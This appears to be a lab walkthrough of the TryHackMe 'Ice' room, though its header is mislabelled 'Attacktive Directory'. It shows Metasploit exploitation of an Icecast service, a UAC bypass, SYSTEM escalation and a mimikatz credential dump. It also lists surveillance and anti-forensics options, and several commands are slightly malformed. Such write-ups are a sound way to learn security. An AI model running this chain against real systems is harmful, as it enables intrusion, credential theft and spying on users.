ICE
Attacktive Directory
In this room we will be using the following tools to compromise a Domain Controller (DC) in order to gain access to the crown jewels of the environment:
Tools Used: Nmap, Kerbrute, Impacket, Enum4Linux, Hashcat, SMBClient, and Secretsdump
To start doing some active recon on the machine we will use the following nmap command to find what port the Microsoft Remote Desktop (MSRDP) is running on:
1
2
(brandon@kali)-[~/thm/attacktivedirectory]
$ nmap -sS -Pn 10.10.10.104
The Microsoft Remote Desktop (MSRDP) is running on the standard port 3389.
Next, we are asked to identify what service is running on port 8000. We will use an nmap command targeting that specific port:
1
2
(brandon@kali)-[~/thm/attacktivedirectory]
$ nmap -Sv - Pn -p 8000 10.10.10.104
The output of the nmap command tells us the port 8000 is running Icecast.
In order to get the hostname of the machine we will have to run a connect scan (-sC) parameter on our nmap scan:
1
2
(brandon@kali)-[~/thm/attacktivedirectory]
$ nmap -sC -Pn 10.10.10.104
he output from the nmap command tells us the name of the target PC is DARK-PC.
We are asked to research a vulnerability with a CVSS score of 7.5 linked to the Icecast service running on port 8000.
We are able to determine that the vulnerability type is Execute Code Overflow and the CVE is CVE-2004-1561
Next, we will want to see if there are any exploits that we can use within the metasploitable framework. You will do this by putting in the following command:
1
2
(brandon@kali)-[~/thm/attacktivedirectory]
$ msfconsole
Now lets use the search feature within metasploit to find the exploit for this service using the following command:
1
2
(brandon@kali)-[~/thm/attacktivedirectory]
$ search icecast
This output yield exactly what we want and the answer to the question is exploit/windows/http/icecast_header. Now we will run the command use 0 to start using the exploit
We will use the command show options to see what settings we need to configure. The only option that is blank is RHOSTS. In this case we will need to set RHOSTS (target machine) and LHOST (our Kali IP) which will be done using the set command as shown below. If you do not know how to get your VPN IP address, then open up another tab and type in the following command focusing on the output related to the tun0.
1
2
(brandon@kali)-[~/thm/attacktivedirectory]
$ ip a | grep tun 0
Now once those variables are set, run the command exploit (or run). You should get a meterpreter shell if everything goes well.
1
2
(brandon@kali)-[~/thm/attacktivedirectory]
$ exploit
Now that we have a shell, in order to find out what permissions we have we will running the command getprivs. This shows us we do have much permissions on this box and will need to escalate our permissions.
1
2
(brandon@kali)-[~/thm/attacktivedirectory]
$ getprivs
To get the user running the icecast process we will run the command getuid, which yields us the user Dark.
1
2
(brandon@kali)-[~/thm/attacktivedirectory]
$ getuid
To get the system information we will run the command sysinfo, which yields us the windows build 7601. The architecture of the processor is in the same output and is x64.
1
2
(brandon@kali)-[~/thm/attacktivedirectory]
$ sysinfo
Let us see if we can find any local exploits using the built in exploit suggester with metasploit running the command run post/multi/recon/local_exploit_suggestor
1
2
(brandon@kali)-[~/thm/attacktivedirectory]
$ run post/multi/recon/local_exploit_suggestor
In our output we get windows exploit to bypass User Access Control (UAC) for Event Viewer. The full path of the exploit is exploit/windows/local/bypassuac_eventvwr. In order to test this UAC bypass, let us background our current session by pressing CTRL+Z then hitting ‘y’ remembering the session number.
Now let us use the exploit with the following command
1
2
(brandon@kali)-[~/thm/attacktivedirectory]
$ use windows/local/bypassuac_eventvwr
Run the show options command to see what we will need to configure for this exploit to work. We will need to set an active meterpreter shell session and LHOST (Kali IP). Thne set our session variable to the background session number got a few steps back. Now run the command exploit (or run) to get your session permission escalated.
Now if we run the command getprivs again we will notice we have a lot more permissions. The permission that allows us to take ownership of a file is SeTakeOwnershipPrivilege. Then running the ps command we will take advantage of the print spooler service spoolsv.exe running with SYSTEM permissions. We will run the command MIGRATE -N spoolsv.exe in an attempt to have our sessions run as SYSTEM under that print spooler service executable. Now if we run the command getuid we will ge the response that we are NT AUTHORITY\SYSTEM.
Now that we own this machine we want to use the tool mimikatz to get loot passwords for the environment. We will start by running the command load kiwi to start load the module
1
2
(brandon@kali)-[~/thm/attacktivedirectory]
$ load kiwi
Using the help command we are able to see which mimikatz command is used to dump all credentials which is creds_all
1
2
(brandon@kali)-[~/thm/attacktivedirectory]
$ creds_all
From the creds dump we are able to get the account Dark’s LM, NTLM and SHA1 hash as well as his password
In a windows environment the passwords are stored in the SAM database. This database can be dumped with the command hashdump and can be used to crack the Administrator password without having to password spray. We have access to the following commands in the shell
- Screenshare command allows use to view the users desktop in real time
- Record mic command allows use record audio from the system mic for X amount of seconds.
- Modify timestamps of the files on the systems to complicate forensics we would use the command timestomp.
- Mimikatz allows us to create a golden ticket which can be utilized to authenticate without having to use a password with the command below.
1
2
(brandon@kali)-[~/thm/attacktivedirectory]
$ golden_ticket_create
Since this is a Windows machine we can RDP to the machine if it is enabled. If RDP is not enabled then it can be done with the metasploit module post/windows/manage/enable_rdp. On this box the RDP service was already running.